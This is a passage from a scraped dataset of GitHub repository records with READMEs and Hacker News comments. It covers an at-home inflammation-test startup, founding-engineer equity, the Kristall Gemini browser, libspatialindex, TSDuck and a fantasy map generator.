and increase the speed and frequency of the test results.I'm sitting in doctors office waiting for my appointment for an inflammation on my hand and I read this. What are the chances.cool. I'm writing from another country. Is is possible to have an access to the tool, but doing the hscrp test from here?This is a very appealing prospect and I'm sure you'll have no problem finding paying customers. The main question I can't help but ask is, how do I, or any potential customer for that matter, know that this isn't simply Theranos 2.0?Good luck Kimberly!Very interesting launch, congrats and good luck!Anecdotally, I've struggled with inflammation (joint pain, needing lots of NSAIDs, adult-onset food allergies), but my C Reactive Protein levels were normal when tested.Have you considered testing fo rother inflammatory markers that might help people like me?First: Congrats on attacking this space. I think there is all sorts of need in the self-managed care world.That said (you just knew there was going to be criticism :)> Overall, we recommend healthy lifestyle habits versus drugs to manage inflammation levels.Such a blanket recommendation strikes me as problematic: Which \"lifestyle habits\" handle the case where CRP is high due to things like (say) cancer? Or mold-toxicity? Or auto-immune issues?In constructing the company, I assume there is a general counsel talented in medical liability, which strikes me as a minefield. I also assume the very public history of Theranos is also going to invite interesting scrutiny, even though you're running a legitimate operation.Good luck to you in any case. Self-managed care should be an interesting space over the next decade imho.I preordered test kits. Looking forward to using it soon and seeing my results!Main advice from the blog is Curcumine, categorizing it as the most effective lifestyle change for bringing down inflammation. But, even though \"natural\", Curcumine is very strong and perhaps should be classified as a medicine.This might seem like nitpicking. But something with a strong effect on the body hardly every just has the effect you want it to have. By seeing it as a medicine it forces you to also look at the negative side effects of it's use over a long period.It's been known to help people with arthritis, but is it wise to use it on a daily basis as a healthy person?Even things as basic as muscle growth have been known to be suppressed by anti-inflammatory medicines like Ibuprophen. I wouldn't be surprised if Curcumine does the same. As well as indications that it might block proper immune responses to infections at times, but Im not sure about this.In general a lifestyle change in my opinion would be: sleep, exercise, stress, meditation, cutting out fried food etc.As someone with an auto-immune disorder, i've managed to reduce inflammation with diet changes, but it is always an ongoing battle against various triggers.Something like this would be great to help me monitor inflammation levels and correlate that data with lifestyle changes (did I eat gluten that week as a cheat? Did I have some milk or chocolate?)There's so many lifestyle changes I make that \"appear\" to reduce inflammation but there's no real way to monitor the effectiveness of those changes on inflammation markers.I know, for example, a primary trigger for me is a pet allergy that triggers a general immune response, which in-turn raises my baseline inflammation and then causes the auto-immune issues. One pet exposure and i'm a wreck for weeks.Being able to track this, and see if antihistamines impact the inflammation ect is helpful.My condition isn't serious enough to warrant immunosuppressive treatment, and heavy steroids are overkill.You can get a CRP level from any lab without a doctors order for about $30. The correct test, drawn and handled correctly, unlike this method.This is really cool, body inflammation plays a huge role in our lives.3 years ago I had a terrible case of atopic urticaria that lasted 9 months. My CRP was over 10 mg/dL.I started to make a handwritten habit diary to look for triggers. Food, type of exercises, exposure to temperatures, mood state, etc. Never pinpointed the issue, but I got better suddenly.Went deep into the body inflammation rabbit hole and found interesting papers on how it relates with depression. I truly believe that my acquaintances suffering from depression could benefit from tracking their CRP levels on a consistent basis and try to bring it down.Best of luck to the Be Golden team!Congratulations on launching.However as a potential customer interested in this space - I'm not sure the pricing/value prop is competitive for me. I used a service called InsideTracker (lab based blood test) earlier this year which measures 43 biomarkers (including hsCRP - my result was 0.4). I think I paid ~$500 for it but that gives a much more holistic view.Is there a case for tracking hsCRP more frequently if my lifestyle is relatively healthy? Are there a few other biomarkers you could include for tracking more regularly with a finger prick? I could see at-home tests being more convenient.I love all the new health monitoring startups.I recently tried documenting my glucose using one of the many startups using electronic patches that measure glucose every few minutes.What is the likelihood that a similar electronic patch would become available for inflammation in the industry?> Some of the ways we market to you include email campaigns, custom audiences advertising, and \u201cinterest-based\u201d or \u201cpersonalized advertising,\u201d including through cross-device tracking.> Advertising Partners. We may share your personal information with third-party advertising partners. These third-party advertising partners may set Technologies and other tracking tools on our Services to collect information regarding your activities and your device (e.g., your IP address, cookie identifiers, page(s) visited, location, time of day). These advertising partners may use this information (and similar information collected from other services) for purposes of delivering personalized advertisements to you when you visit digital properties within their networks. This practice is commonly referred to as \u201cinterest-based advertising\u201d or \u201cpersonalized advertising.\u201d APIs/SDKs. We may use third-party Application Program Interfaces (\u201cAPIs\u201d) and Software Development Kits (\u201cSDKs\u201d) as part of the functionality of our Services. For more information about our use of APIs and SDKs, please contact us as set forth in \u201cContact Us\u201d below.This is a bummer. Can no company exist without Facebook and Google Pixels?Being a researcher in social sciences, one thing that puzzles me of medicine is that a single timepoint analysis leads to major decisions. I understand you perform analyses every 1-2 months, is there data indicating that the sweet spot for maximising information from testing is there?This is like 10x the cost of other hsCRP tests you can take from home.Pretty hard to justify the cost differential.Also, going to a proper doctor and having a real blood test done once a year would cost way less than this.This gives me strong scam / nonsense vibes.Stupid question(s) for a non-medical person who doesn't even know enough to be wrong.I really thought \"inflammation\" is/was a generic term for a myriad of different causes and symptoms. Did something change and now we \"know\" that inflammation == c reactive protein? Or is this just one particular well-known marker of a common cluster of inflammation symptoms? Or am I just completely confused about the whole thing?happy to take answers from OP or others.This would be great for canker sores.I was first eng at 2 YC companies so can share my experience:Benefits:- Learn on the job- Learn to start companies/test ideasDrawbacks:- Company pivots or moves locations? Can lose all equity if < year 1 even if you stayed up late often building first MVP- All of your pointsThe payoff could be the startup, but more likely it's the experience and skills for down the line. Are you inexperienced? Then it's a great option if you want to start a startup in the future.For me I ended up getting a full time, much much better job by essentially going through the agile sprint wringer at multiple startups. It would be a much harder sell now to me, not that I'm not open to it, I just have more of a radar for better startups now.Caveat if you don't have the skills required to start the company, then there's no opportunity cost and the opportunity cost exists somewhere else if you have other skills. I did notice how several founders were very good at fundraising, instead of writing code -- and it was equally important. I was interested in this question too after seeing this post.The criterion for getting early funding from places like Ycombinator has changed substantially. The thinking used to be to find great teams including tech ability, invest in them very early, and let them pivot around until they find product-market fit.In the last few years, the model has shifted substantially. Now, it seems that incubators and early money investors expect you to already have a decent business idea, have it in some sort of production or beta cycle, and show actual revenue for a year or more before they're interested in risking their money.In practice, this skews the whole process in favor of people with a business and product focus. Frequently, I'm seeing MVPs that are built offshore by inexpensive teams, or even some of the no code solutions. Early funding is basically raid your saving account, and hit up your friends and family (or, be a repeat founder with a big win on your bio).\n,\nIf the mvp shows some traction, there suddenly needs to be some serious technical leadership, which is not the skill set of the founders. The founding engineer concept is an attempt to square this circle by giving enough equity to a talented tech lead to convince investors that you have the technical chops to chart a course over a few years and execute without a major catastrophe.As to the surprisingly low comp, here's the truth: Startup has become a glamour profession, equivalent to fashion or entertainment. You can pay poorly because there's a long line of people with the talent and ambition to try it out. The status boost you get by saying you're working at a Silicon Valley startup with white shoe VC investors is very valuable in some circles.If you want to make money, and you can cut it, do Faang. If you have a relatively low aversion to risk, and ambition to do big things and be important someday, take the plunge with startup, but don't fool yourself for a minute that it's a sure thing, no matter how smart you are. Hey, [name]! I think it's great that you're thinking about the role of the founding engineer.I think it's important to understand that a \"founding engineer\" is someone who has been with a company since its inception\u2014someone who has been instrumental in building and developing the product/service/company from the ground up. That doesn't mean they can't also be a co-founder, but I'd say that's not necessarily true. Founding engineers are usually the people who don't put their equity and their money is not at risk during the early stages that decide the fate of the company. But when they do own the risk, they are taken as founding member.It sounds like you're wondering whether or not the term \"founding engineer\" is trying to conflate the role of founder with much less of the benefit. Yes, there are definitely benefits to being a founder\u2014and things that come along with being one\u2014but I don't think those benefits apply to all founders. It really depends on what kind of business you're building and how much risk you're willing to take on as an entrepreneur.Previously:https://news.ycombinator.com/item?id=29783822Founder = worked on biz for months or years without salary. (If founders did have salaries then that\u2019s a different situation.) If you get to join an existing startup with a salary then you\u2019re basically post-founder stage, as the company already raised capital. Of course, that doesn\u2019t mean you couldn\u2019t get the title but your equity is likely going to be lower regardless.Founding engineer = first engineer but it\u2019s not clear yet what the long term role should be (eg CTO vs VP Eng). Sometimes it means the person is very junior and it\u2019s a wait and see type of situation. Sometimes it means it\u2019s not clear to the involved sheet things will head in terms of your work.At least that\u2019s how I\u2019ve been using them. If you joined my startup as a first engineer, then you can pick your title, but I would nudge you in the direction that makes sense. It often comes down to many CTO folks being architects and not active code writers. In an early startup that\u2019s not always ideal of course, why it\u2019s often better to start with a founding engineer title.If you think you\u2019re heading in the direction of being the future CTO, I think you should angle for 5%. My guess is they\u2019re not seeing you as that (eg if you\u2019re very junior), but your equity is def very strong for a non-CTO role IMHO.P.S.: the company valuation and your market comp determine your %. For example, if your market value is considered $200k and the company can afford to pay only a $100k salary then you\u2019d get $100k worth of equity.I agree with your sentiment. Can anyone suggest alternative solutions?How should founders hire early engineers who feel invested in the company?- offer more equity- offer more salary- offer the same position but with no \u201cfounding\u201d title. (Would your rather work the same position with no \u201cfounding\u201d title? Different title? \u201cFoundational engineer\u201d?)- get more co-founder engineers with 10%+ equityThe founding engineer's job is to lay down the foundation, take a small paycheck and then disappear from the scene. Those 2% are as good as two units of the startup's own currency that its owners can print in any quantity.To answer your question narrowly, some VC or incubator came up with this title. It would be interesting to trace the history, or maybe, maybe someone here is or knows the inventor of it.It simply means early employee and carries no other significance. It generally implies some technical seniority but I've seen this given to lower level or lower experienced folks as well. It's interesting that internally, if ranks (levels) are shared, that when the company reaches a hundred or hundreds of employees, the early engineers will be readily identifiable and perhaps command a certain respect or deference.I find it to be a form of title inflation, used to attract early employees.You are correct, that founders will have an order of magnitude more equity. But also, note that non-denominated plain ole \"engineers\" will have an order of magnitude less equity than founding engineers. Surely you must agree that they also carry nearly the same risk. As an employee earning startup market rate ($160-$180k) your risk is on par with those who come on at A or B rounds, so yes this is a sweet deal IMO, title inflation aside.In a very real way, your risk is actually much less than later employees, even series A. By that time, the equity is much more expensive to exercise. At \"founding engineer\" time, it's cheap enough that you don't even have to think about it. Just early exercise it.Getting the business and funding to pay your founding eng salary is a substantial amount of work and risk. Viewed a different way, you\u2019re getting a lot of the upside with almost zero risk.It's a midpoint between founder and engineer. You get low salary and low equity. But it's enough salary that you're not eating rice and beans and have the money for the occasional Steam sale. And presumably enough equity to retire once the company IPOs.You still share the high risk of failure, but the actual cost of failure is much lower.I mean... someone has to be the first employee or first technical employee. Everyone can't be a founder. I'm ignoring the term \"founding engineer\" because I also find it a bit disingenuous, and I consider that just a terminology fad.How do you decide how to balance that? YC/Silicon Valley has settled chiefly on near-market (~80%, it seems) rate salary and a much more significant stake (0.5-1.5%-ish, I guess) than later employees.The other factors that play into it, in my mind, are:* interested, but not ready to be a founder; by whatever definition they want to use* less \"feeling\" of risk as a 1st employee vs. actual risk (this one CAN'T be discounted. emotions are not rational)* wanting to have a much larger area of responsibility than they could at other companies* firmly believing in the company/founders/mission for whatever reasonThose seem to be the things that come up in every discussion I remember. Let me know if I missed anything obvious.The job title implies a lie and is a marketing ploy that will throw founder responsibilities and risk on a senior developer role.If you are not at the choosing the stack. If they insist on testing your technical abilities these raise red flags. Who is choosing the stack.. who is testing your technical abilities? The real founding engineer..", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "MasterQ32/kristall", "link": "https://github.com/MasterQ32/kristall", "tags": ["gemini-protocol", "browser", "qt5", "qt5-gui", "gopher", "gopher-client", "gopher-protocol", "finger", "finger-protocol"], "stars": 639, "description": "Graphical small-internet client for windows, linux, MacOS X and BSDs. Supports gemini, http, https, gopher, finger.", "lang": "C++", "repo_lang": "", "readme": "# Kristall\nA high-quality visual cross-platform gemini browser.\n\n![Preview Image](https://mq32.de/public/336ac416892fd9064593631e7be9f7d8e266196b.png)\n\n## Features\n- Multi-protocol support\n - [Gemini](https://gemini.circumlunar.space/)\n - HTTP\n - HTTPS\n - [Finger](https://tools.ietf.org/html/rfc1288)\n - [Gopher](https://tools.ietf.org/html/rfc1436)\n- Document rendering\n - `text/gemini`\n - `text/html` (reduced feature set)\n - `text/markdown`\n - `text/*`\n - `image/*`\n - `video/*`\n - `audio/*`\n- TLS Management\n - Supports client certificates\n - Supports TOFU and CA TLS handling for both Gemini and HTTPS\n- [Outline generation](https://mq32.de/public/a50ef327f4150d870393b1989c5b41db495b56f7.png) ([Video](https://mq32.de/public/kristall-02.mp4))\n- Favourite Sites\n- Navigation history\n- Tabbed interface\n- Survives [ConMans torture suite](gemini://gemini.conman.org/test/torture/) as well as the [Egsam Torture Suite](gemini://egsam.pitr.ca/)\n- [Special link highlighting for different targets](https://mq32.de/public/92f3ec7a64833d01f1ed001d15c8db4158e5d3c2.png)\n- Color Themes\n - Custom document color theme\n - [Automatic light/dark theme based on the host name](https://mq32.de/public/kristall-01.mp4)\n - Dark/Light UI theme\n- Crossplatform supports\n - Linux\n - Windows\n - FreeBSD\n - NetBSD\n - OpenBSD\n - macOS\n - Haiku\n\n## Screenshots\n\n### Generates Outlines\n\n![Outline Generation](https://mq32.de/public/a50ef327f4150d870393b1989c5b41db495b56f7.png)\n\n### Fully Customizable Site Theme\n\n![Site Theme](https://mq32.de/public/7123e22a58969448c27b24df8510f4d56921bf23.png)\n\n## Build/Install Instructions\n\n**Note:** `master` branch is the latest development status (sometimes called \"nightly\") whereas the tagged versions are the stable releases.\n\nIf you want to build a stable experience, check out the latest version and build that!\n\nSee [BUILDING.md](BUILDING.md)\n\n## Credits\n\n- Thanks to [James Tomasino](https://tomasino.org) for helping out with understanding gopher\n- Thanks to [Vane Vander](https://mayvaneday.art/) for providing the Haiku build instructions\n- Thanks to James Tomasino, styan and tiwesdaeg for improving the `Makefile`\n- Thanks to [Alex Naskos](https://github.com/alexnask) for providing windows build instructions\n- Thanks to tiwesdaeg for improving the application icon\n\n## Changelog\n\nSee [src/about/updates.gemini](src/about/updates.gemini)\n\n## Roadmap\n\nSee [ROADMAP.md](ROADMAP.md)\n\n## License\n\nKristall is released under the GPLv3 or (at your option) any later version.\n[See LICENSE as well](LICENSE)\n", "readme_type": "markdown", "hn_comments": "For gemini I use either castor[0] or dragonstone[1]. Both are quite good, dragonstone even has tabs.Both are written for GTK, so they integrate quite good with GNOME.[0]: https://git.sr.ht/~julienxx/castor[1]: https://gitlab.com/baschdel/dragonstoneThis looks seriously cool.I might install it in a VM like Palemoon (because security) and try use it as a main non-work browser to see how it fares.IMO the world badly needs a truly independent browser.Another excellent client is Lagrange: https://gmi.skyjake.fi/lagrange/What can I do with Gopher and Finger? (isn't Gopher also a Haskell like programming lang?)It seems based on Qt for cross-platform ui graphical toolkit, without surprise, nowadays people seem to have settlers on this (understandably)That's nice! But since it's also for Windows, I was surprised not to see binary releases, just the source. Most Windows users won't bother compiling from source.Edit: Found on the project page: https://kristall.random-projects.net/Original title was \"Graphical small-internet client\", like the Github page title. Moderator changd it.If you'd like to learn more about the Gemini Protocol, head to https://geminiquickst.art/And if you're more partial to terminal browsers, I've written my own. https://github.com/makeworld-the-better-one/amforaKristall is good, but Lagrange is more finished, imho. But the great thing about Gemini is that it is possible to write a fully featured Gemini browser in a weekend, so there are plenty about. Just try writing your own Web browser with anything less than a couple-billion dollars handy. Even Microsoft gave up.https://news.ycombinator.com/item?id=29291392Does this have its own original html renderer? That's really cool.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "libspatialindex/libspatialindex", "link": "https://github.com/libspatialindex/libspatialindex", "tags": ["c-plus-plus", "spatial-indexing"], "stars": 638, "description": "C++ implementation of R*-tree, an MVR-tree and a TPR-tree with C API", "lang": "C++", "repo_lang": "", "readme": ".. image:: https://dev.azure.com/hobuinc/libspatialindex/_apis/build/status/libspatialindex.libspatialindex?branchName=master\n\n*****************************************************************************\n libspatialindex\n*****************************************************************************\n\n\n:Author: Marios Hadjieleftheriou\n:Contact: mhadji@gmail.com\n:Revision: 1.9.3\n:Date: 10/23/2019\n\nSee http://libspatialindex.org for full documentation.\n\n.. image:: https://readthedocs.org/projects/libspatialindex/badge/?version=latest\n :target: https://libspatialindex.org/en/latest/?badge=latest\n :alt: Documentation Status\n", "readme_type": "rst", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tsduck/tsduck", "link": "https://github.com/tsduck/tsduck", "tags": ["mpeg", "dvb", "mpeg-ts", "dvb-ip", "dvb-si", "dvb-psi", "teletext", "dvb-t2-mi", "dvb-simulcrypt", "hls", "atsc", "digital-tv", "srt", "isdb", "arib", "epg", "rist", "scte-35", "dektec", "vatek"], "stars": 638, "description": "MPEG Transport Stream Toolkit ", "lang": "C++", "repo_lang": "", "readme": "## TSDuck - The MPEG Transport Stream Toolkit\n\n### Abstract\n\n[TSDuck](https://tsduck.io/) is an extensible toolkit for MPEG transport streams.\n\nTSDuck is used in digital television systems for test, monitoring, integration, debug, lab or demo.\n\nIn practice, TSDuck is used for:\n\n- Transport stream acquisition or transmodulation, including DVB, ATSC, ISDB, ASI and IP multicast.\n- Analyze transport streams, PSI/SI signalization, bitrates, timestamps.\n- Monitor and report conditions on the stream (video and audio properties, bitrates, crypto-periods, signalization).\n- On-the-fly transformation or injection of content and signalization.\n- Modify, remove, rename, extract services.\n- Work on live transport streams, DVB-S/C/T, ATSC, ISDB-T, ASI, UDP (\"IP-TV\"), HTTP, HLS, SRT, RIST or offline transport stream files.\n- Use specialized hardware such as cheap DVB, ATSC or ISDB tuners (USB, PCI), professional Dektec devices, cheap HiDes modulators, VATek-based modulators (e.g. Suntechtv U3, USB).\n- Re-route transport streams to other applications.\n- Extract or inject Multi-Protocol Encapsulation (MPE) between TS and UDP/IP.\n- Analyze and inject SCTE 35 splice information.\n- Extract specific encapsulated data (Teletext, T2-MI).\n- Emulate a CAS head-end using DVB SimulCrypt interfaces to and from ECMG or EMMG.\n- And more...\n\nTSDuck is developed in C++ in a modular architecture. It is easy to extend\nthrough plugins.\n\nTSDuck is simple; it is a collection of command line tools and plugins. There is\nno sophisticated GUI. Each utility or plugin performs only one elementary feature\nbut they can be combined in any order.\n\nThrough `tsp`, the Transport Stream Processor, many types of analysis and\ntransformation can be applied on live or recorded transport streams.\nThis utility can be extended through plugins. Existing plugins can be\nenhanced and new plugins can be developed using a library of C++ classes.\n\n### Usage\n\nTSDuck comes with a comprehensive [User's Guide](https://tsduck.io/download/docs/tsduck.pdf).\n\nAll utilities and plugins accept the option `--help` to display their syntax.\n\nFor programmers, TSDuck provides a large collection of C++ classes in one single library.\nThese classes manipulate, in a completely portable way, MPEG transport streams, MPEG/DVB/ATSC/ISDB\nsignalization and many other features. See the [programming guide](https://tsduck.io/doxy/)\nand its [tutorial](https://tsduck.io/doxy/libtutorial.html).\n\nPython and Java bindings exist to allow running transport stream processing pipelines from\nPython or Java applications.\n\n### Building\n\nTSDuck can be built on Windows, Linux, macOS and BSD systems (FreeBSD, OpenBSD, NetBSD, DragonFlyBSD).\nSee the [building guide](https://tsduck.io/doxy/building.html) for details.\n\n### Download\n\nPre-built [binary packages](https://github.com/tsduck/tsduck/releases) are available\nfor Windows and the very latest versions of some Linux distros\n(Fedora, RedHat, CentOS, AlmaLinux, Ubuntu, Debian, Raspbian).\nOn macOS, [use the Homebrew packager](https://tsduck.io/doxy/installing.html#macinstall).\n\nThe latest developments can be tested using [nightly builds](https://tsduck.io/download/prerelease/).\n\nThe command `tsversion --check` can be used to check if a new version of TSDuck is available\nonline. The command `tsversion --upgrade` downloads the latest binaries for the current\noperating system and upgrades TSDuck.\n\n### Project resources\n\nTSDuck is maintained by one single developer on spare time and on personal expenses.\nYou may consider [contributing](https://tsduck.io/donate/) to the hardware and Web hosting costs\nusing [![Donate](https://tsduck.io/images/donate-paypal.svg)](https://tsduck.io/donate/)\n\n### License\n\nTSDuck is distributed under the terms of the Simplified BSD License.\nSee the file `LICENSE.txt` for details.\n\n*Copyright (c) 2005-2023, Thierry Lelegard*
\n*All rights reserved*\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "rlguy/FantasyMapGenerator", "link": "https://github.com/rlguy/FantasyMapGenerator", "tags": ["procedural-generation", "erosion", "map-generation"], "stars": 638, "description": "A fantasy map generator based on Martin O'Leary's \"Generating fantasy map\" notes", "lang": "C++", "repo_lang": "", "readme": "# Fantasy Map Generator\n\nThis program is an implementation of a fantasy map generator written in C++ based on the methods described in Martin O'Leary's \"Generating fantasy map\" notes (https://mewo2.com/notes/terrain/). \n\nThis project uses [jsoncons](https://github.com/danielaparker/jsoncons) for parsing JSON data, [Argtable3](http://www.argtable.org/) for parsing command line arguments, [Python](https://www.python.org/) and [PyCairo](https://cairographics.org/pycairo/) for drawing, and data from [GeoNames](http://www.geonames.org/) for city name data.\n\nThe project page and generation notes are also available here: [http://rlguy.com/map_generation](http://rlguy.com/map_generation)\n\n[![alt tag](http://rlguy.com/map_generation/images/example_small.jpg)](http://rlguy.com/map_generation/images/example_large.jpg)\n\n[![alt tag](http://rlguy.com/map_generation/images/gallery00_small.jpg)](http://rlguy.com/map_generation/images/gallery00_large.jpg)\n\n[![alt tag](http://rlguy.com/map_generation/images/gallery01_small.jpg)](http://rlguy.com/map_generation/images/gallery01_large.jpg)\n\n[![alt tag](http://rlguy.com/map_generation/images/gallery02_small.jpg)](http://rlguy.com/map_generation/images/gallery02_large.jpg)\n\n[![alt tag](http://rlguy.com/map_generation/images/gallery03_small.jpg)](http://rlguy.com/map_generation/images/gallery03_large.jpg)\n\n[![alt tag](http://rlguy.com/map_generation/images/gallery05_small.jpg)](http://rlguy.com/map_generation/images/gallery05_large.jpg)\n\n[![alt tag](http://rlguy.com/map_generation/images/gallery04_small.jpg)](http://rlguy.com/map_generation/images/gallery04_large.jpg)\n\n# Dependencies\n\nThere are three dependencies that are required to build this program:\n\n1. Python 2.7+\n2. PyCairo graphics library (https://cairographics.org/pycairo/)\n3. A compiler that supports C++11\n\n## Installing PyCairo on Windows\n\nPrebuilt Windows binaries for PyCairo and its dependencies can be obtained by following [this guide on installing igraph](http://www.cs.rhul.ac.uk/home/tamas/development/igraph/tutorial/install.html), which uses PyCairo for drawing. The relevant section is titled \"Graph plotting in igraph on Windows\".\n\nTo check if PyCairo was installed correctly, try importing the module within the Python interpretor:\n\n```\nimport cairo\n```\n\n# Installation\n\nThis program uses the [CMake](https://cmake.org/) utility to generate the appropriate solution, project, or Makefiles for your system. The following commands can be executed in the root directory of the project to generate a build system for your machine:\n\n```\nmkdir build && cd build\ncmake ..\n```\n\nThe first line creates a new directory named ```build``` and changes the working directory to the newly created build directory. The second line runs the CMake utility and passes it the parent directory which contains the ```CMakeLists.txt``` file.\n\nThe type of build system generated by CMake can be specified with the ```-G [generator]``` parameter. For example:\n\n```\ncmake .. -G \"MinGW Makefiles\"\n```\n\nwill generate Makefiles for the MinGW compiler which can then be built using the [GNU Make](https://www.gnu.org/software/make/) utility with the command ```make```. A list of CMake generators can be found [here](https://cmake.org/cmake/help/v3.0/manual/cmake-generators.7.html).\n\nOnce successfully built, the program will be located in the ```build/``` directory.\n\n## Running the Map Generator\n\nThe map generator is a command line tool and can be invoked with the command:\n\n```\n./map_generator [OPTIONS]\n```\n\nLeaving the options blank will generate a high quality map with resolution ```1920x1080``` to the file ```output.png```.\n\nA set of options can be displayed with the ```--help``` flag:\n\n ```\n >>> ./map_generator --help\n\nUsage: map_generation [-hv] [-s ] [--timeseed] [-r ] [-o filename] \n[] [-e ] [--erosion-steps=] [-c ] [-t ] \n[--size=] [--draw-scale=] [--no-slopes] [--no-rivers] \n[--no-contour] [--no-borders] [--no-cities] [--no-towns] [--no-labels] \n[--no-arealabels] [--drawing-supported]\n\nOptions:\n\n -h, --help display this help and exit\n -s, --seed= set random generator seed\n --timeseed set seed from system time\n -r, --resolution= level of map detail\n -o, --output=filename output file\n output file\n -e, --erosion-amount= erosion amount\n --erosion-steps= number of erosion iterations\n -c, --cities= number of generated cities\n -t, --towns= number of generated towns\n --size= set output image size\n --draw-scale= set scale of drawn lines/points\n --no-slopes disable slope drawing\n --no-rivers disable river drawing\n --no-contour disable contour drawing\n --no-borders disable border drawing\n --no-cities disable city drawing\n --no-towns disable town drawing\n --no-labels disable label drawing\n --no-arealabels disable area label drawing\n --drawing-supported display whether drawing is supported and exit\n -v, --verbose output additional information to stdout\n\n ```\n\nExample:\n\nThe following command will output program information to the screen (-v), will set the random generator seed to your current system time (--timeseed), will set the resolution to 0.08 (-r 0.08), and write the generated map to the file ```fantasy_map.png``` (-o fantasy_map.png).\n\n```./map_generation.exe -v --timeseed -r 0.08 -o fantasy_map.png```\n\n# Map Generation Process\n\nThe map generation process involves the generation of irregular grids, the generation of terrain, the generation of city/town locations and their borders, and the generation of label placements.\n\n## Generating Irregular Grids\n\nA Poisson disc sampler generates a set of random points with the property that no two points are within some set radius of eachother.\n![alt tag](http://rlguy.com/map_generation/images/uniform_vs_poisson_sampling.jpg)\n\nThe set of points are triangulated in a Delaunay triangulation. The triangulation is stored in a doubly connected edge list (DCEL) data structure.\n![alt tag](http://rlguy.com/map_generation/images/uniform_vs_poisson_delaunay.jpg)\n\nThe dual of the Delaunay triangulation is computed to produce a Voronoi diagram, which is also stored as a DCEL.\n![alt tag](http://rlguy.com/map_generation/images/uniform_vs_poisson_voronoi.jpg)\n\nEach vertex in the Delaunay triangulation becomes a face in the Voronoi diagram, and each triangle in the Delaunay triangulation becomes a vertex in the Voronoi diagram. A triangle is transformed into a vertex by fitting a circle to the three triangle vertices and setting the circle's center as the position of a Voronoi vertex. The following image displays the relationship between a Delaunay triangulation and a Voronoi diagram.\n\n![alt tag](http://rlguy.com/map_generation/images/voronoi_delaunay_overlay.jpg)\n\nThe vertices of the Voronoi diagram will be used as the nodes in an irregular grid. Note that each node has exactly three neighbours.\n\n## Generating Terrain\n\nAn initial height map is generated using a set of primitives:\n- addHill - Create a rounded hill where height falls off smoothly\n- addCone - Create a cone where height falls off linearly\n- addSlope - Create a slope gradient that runs parallel to a line\n\nand a set of operations:\n- normalize - Normalize the height map values to [0,1]\n- round - Round height map features by normalizing and taking the square root of the height values\n- relax - Replace height values with the average of their neighbours\n- setSeaLevel - Translate the height map so that the new sea level is at zero\n\n![alt tag](http://rlguy.com/map_generation/images/heightmap_primitives.jpg)\n\nContour lines are generated from the Voronoi edges. If a contour line is generated for some elevation h, a Voronoi edge will be included in the countour if one of its adjacent faces has a height less than h while the other has a height greater than or equal to h.\n\n![alt tag](http://rlguy.com/map_generation/images/heightmap_contour.jpg)\n\nA flow map is generated by tracing the route that water would flow over the map. At each point on the grid, a path must be traced downhill to the edge of the map. This means that there can be no sinks or depressions within the height map. Depressions are filled by using the [Planchon-Darboux Algorithm](http://horizon.documentation.ird.fr/exl-doc/pleins_textes/pleins_textes_7/sous_copyright/010031925.pdf) to ensure that a path to the edge of the map exists for all grid points.\n\n![alt tag](http://rlguy.com/map_generation/images/flowmap.jpg)\n\nThe height map is then eroded by using the flow map data and terrain slope data.\n\n![alt tag](http://rlguy.com/map_generation/images/erosion_process.jpg)\n\nPaths representing rivers are generated at points where the amount of flux (river current) is above some threshold. The path of the river follows the flow map until it reaches a coastline or the edge of the map.\n\n![alt tag](http://rlguy.com/map_generation/images/river_generation.jpg)\n\nThe height map is shaded based upon the horizontal component of the slope. Short strokes are drawn at faces where the slope is above some threshold. Strokes pointing upwards from left to right are drawn if the height map is sloping upward from left to right, and strokes pointing downward from left to right are drawn if the height map is sloping downward from left to right.\n\n![alt tag](http://rlguy.com/map_generation/images/slope_shading.jpg)\n\n## Generating Cities and Borders\n\nCity score values are computed to determine the location of a city and have a bonus at locations where there is a high flux value and a penalty at locations that are too close to other cities or too close to the edge of the map.\n\n![alt tag](http://rlguy.com/map_generation/images/city_scores.jpg)\n\nCities are placed at locations where the city score value is at a maximum.\n\n![alt tag](http://rlguy.com/map_generation/images/city_locations.jpg)\n\nFor each city, the movement cost is calculated at each tile (Voronoi face). Movement costs are based on horizontal and vertical distance, amount of flux (crossing rivers), and transitioning from land to sea (or sea to land).\n\n![alt tag](http://rlguy.com/map_generation/images/movement_costs.jpg)\n\nThe tiles are then divided amongst the cities depending on who has the lowest movement cost for the tile.\n\n![alt tag](http://rlguy.com/map_generation/images/territories_unclean.jpg)\n\nThis method tends to create jagged borders and disjointed territories. The territories are cleaned up by smoothing the edges and by adding a rule that a city territory must contain the city and be a contiguous region.\n\n![alt tag](http://rlguy.com/map_generation/images/territories_clean.jpg)\n\nBorders are then generated around the city territories.\n\n![alt tag](http://rlguy.com/map_generation/images/territory_borders.jpg)\n\nTowns can be added to the map by using the same process that is used to generate city locations. Towns are contained within the city territories and are not involved in territory/border generation.\n\n## Generating Label Positions\n\nThe label placement system is based on methods described in this paper: [A General Cartographic Labeling Algorithm](http://www.merl.com/publications/docs/TR96-04.pdf). \n\nThere are two types of labels that will need to be generated: marker labels that label city and town markers, and area labels that label the city territories.\n\nThe labeling process begins by generating candidate label positions for the marker and area labels and calculating a base score for each label.\n\nMarker label candidates are generated around a city or town marker. The calculated scores depend on orientation about the marker, how many river, border, and contour lines the label overlaps, whether the label overlaps another marker, and whether the marker is contained within the map.\n\n![alt tag](http://rlguy.com/map_generation/images/marker_label_candidates.jpg)\n\nArea label candidates are generated within territory boundaries. The calculated scores are similar to the marker label scores except that the orientation score is based upon how much of the label is contained within the territory that it names.\n\n![alt tag](http://rlguy.com/map_generation/images/area_label_candidates.jpg)\n\nThe number of area label candidates is then narrowed down by selecting only the candidates with the best scores.\n\n![alt tag](http://rlguy.com/map_generation/images/area_label_candidates_refined.jpg)\n\nAfter all candidates for the marker and area labels have been generated, the final label candidates are selected by running the following algorithm: \n\n```\n1. Initialize the label configuration by selecting a candidate randomly for each label. \n2. Initialize the \"temperature\" T to an initial high value.\n3. Repeat until the rate of improvement falls below some threshold:\n a) Decrease T according to an annealing schedule.\n b) Chose a label randomly and randomly select a new candidate.\n c) Compute \u0394E, the change in label configuration score caused by selecting a new label candidate.\n d) If the new labeling is worse, undo the candidate change with a probability P = 1.0 - exp(\u0394E/T).\n```\nThe score of a label configuration is calculated by averaging the base scores of the selected candidates and adding an additional penalty for each set of overlapping candidates.\n\nThe initial high value of the 